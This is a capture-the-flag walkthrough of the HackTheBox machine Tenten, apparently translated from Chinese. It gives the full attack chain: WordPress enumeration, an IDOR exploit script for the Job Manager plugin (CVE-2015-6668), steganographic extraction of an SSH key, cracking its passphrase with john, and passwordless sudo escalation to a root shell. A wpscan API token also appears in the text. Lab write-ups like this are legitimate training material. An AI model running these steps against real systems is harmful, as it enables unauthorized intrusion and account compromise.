Tenten is a medium-difficulty target machine. The knowledge points involve WordPress plug-in utilization, SSH key blasting, SSH private key login, sudo privilege escalation, etc. Interested students can learn in HackTheBox.
Customs clearance mind map
0x01 detection
port detection
First do a port scan with nmap
copynmap -Pn -p- -sV -sC -A 10.10.10.10 -oA nmap_Tenten
The scan results show that the target only opens ports 22 and 80
port 80
Access is redirected to tenten.htb, so domain name resolution needs to be configured in the hosts file
copyvim /etc/hosts #configuration 10.10.10.10 tenten.htb
Visit the page again as follows, the template used by the site is WordPress, and its title is Job Portral
There is only the default template Hello world in the website
Click Job Listing to enter the job introduction, the position currently being recruited is penetration testing
Click Apply Now to fill in your resume, which includes name, email, address and other information
copyhttp://tenten.htb/index.php/jobs/apply/8/
Although there is a file upload point, an error will occur when submitting a resume after uploading a PHP script file
Try to change the 8 in the URL for submitting your resume to 1, and change the title from the original Pen Tester to Hello World
copyhttp://tenten.htb/index.php/jobs/apply/1/
Cooperate with grep and cut commands to filter titles
copycurl -s http://tenten.htb/index.php/jobs/apply/8/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1
Write a script to iterate over the numbers in the URL
copyfor i in $(seq 1 25); do echo -n "$i: "; curl -s http://tenten.htb/index.php/jobs/apply/$i/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1;done
Successfully obtained the following titles:
copy1: Job Application: Hello world! 2: Job Application: Sample Page 3: Job Application: Auto Draft 5: Job Application: Jobs Listing 6: Job Application: Job Application 7: Job Application: Register 8: Job Application: Pen Tester 10: Job Application: Application 11: Job Application: cube 12: Job Application: Application 13: Job Application: HackerAccessGranted 14: Job Application: Application
directory scan
WordPress is an open source content management system (CMS) that can be used to build websites, blogs, and applications. It provides a user-friendly interface for users to create and manage content, and has a wealth of plugins and themes to extend its functionality.
Use gobuster to scan the directory of the site, and the results only include the common directories and files of WordPress
copygobuster dir -u http://tenten.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100 --no-error
vulnerability scan
Use wpscan to conduct a special scan of WordPress templates, and the results show that the WordPress theme is twentyseventeen
copywpscan --url http://tenten.htb --api-token Rjr3NLjvRw21PbkmvY6h4EI1uqS5wB9lzCpPiLziH3A -e
It is found that there is a plug-in Job Manager, and there are two vulnerabilities in it, namely IDOR and XSS
Also found a username takis
0x02 online [takis]
Job Manager plugin
As one of the most popular website building platforms in the world, WordPress generally has vulnerabilities in plugins, and only the Job Manager plugin exists in the site. wpscan found that there are two vulnerabilities in Job Manager. XSS has no value in the current environment, so we can focus on CVE-2015-6668. The modified code is as follows:
Script address: https://github.com/k4u5h41/CVE-2015-6668
import requests
print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
#filename = raw_input('Enter a file name: ')
filenames = ["Hello world!","Sample Page","Auto Draft","Jobs Listing","Job Application","Register","Pen Tester","Application","cube","HackerAccessGranted"]
for filename in filenames:
filename2 = filename.replace(" ", "-")
for year in range(2013,2018):
for i in range(1,13):
for extension in {'jpg','jpeg','docx'}:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
req = requests.get(URL)
if req.status_code==200:
print "[+] URL of CV found! " + URL
Successfully obtained the address and accessed it, the picture may have used steganography
copyhttp://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg
SSH key blasting
Use steghide to analyze the picture and successfully get id_rsa
copysteghide extract -sf HackerAccessGranted.jpg
Generally speaking, id_rsa is used as a private key in SSH
copycat id_rsa
Convert id_rsa to hash by ssh2john to use john blasting
copypython /usr/share/john/ssh2john.py id_rsa
Use john to blast and successfully get the password as superpassword
copyjohn id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
SSH private key login
Try to use the private key to log in to SSH, first give it 400 permissions
copychmod 400 id_rsa
Log in to user takis with the private key and of course the password
copyssh -i id_rsa takis@10.10.10.10
Successfully found the first flag in the current user's home directory
copycat user.txt
0x03 privilege escalation [root]
collect message
Check the sudo permissions of the current user, the results show that the sudo command can be used to execute any super user permissions, but the premise is that you need to have the password of the current user, only when you run /bin/fuckin with sudo without entering the password
copysudo -l
Look at /bin/fuckin, its content is a Bash script, there are four input parameters
copycat /bin/fuckin
try to run the program fuckin
copy/bin/fuckin echo mac
sudo privilege escalation
Since sudo does not require a password to run fuckin, enter the command id to view the current permission as root
copysudo /bin/fuckin id
Successfully obtained root's shell
copysudo /bin/fuckin /bin/bash
Successfully obtained the second flag in the /root directory
copycat /root/root.txt
0x04 summary
Tenten is translated as two tens, which may be taken from twenty in the WordPress theme twentyseventeen. Through information collection, it is found that the CMS used by the target site is WordPress. A simple browsing of the website shows that the main function of the site is work photos. Try to use wpscan to scan and find the username takis and the WordPress plugin Job Manager. There are two vulnerabilities in the plugin, namely XSS and IDOR. I searched for resumes based on the IDOR vulnerability enumeration, and finally successfully found a picture using steganography.
The SSH private key id_rsa was found after analysis using steghide. Since the private key cannot be used directly and a password is required, the private key is converted into a blastable hash value through ssh2john, and finally the plaintext password is successfully blasted using john. Use this password to complete the SSH private key login and successfully obtain user permissions. Check the sudo authority of the current user in the server, and find that /bin/fuckin can be executed through sudo without a password, so the sudo command can be successfully elevated to root authority with /bin/fuckin.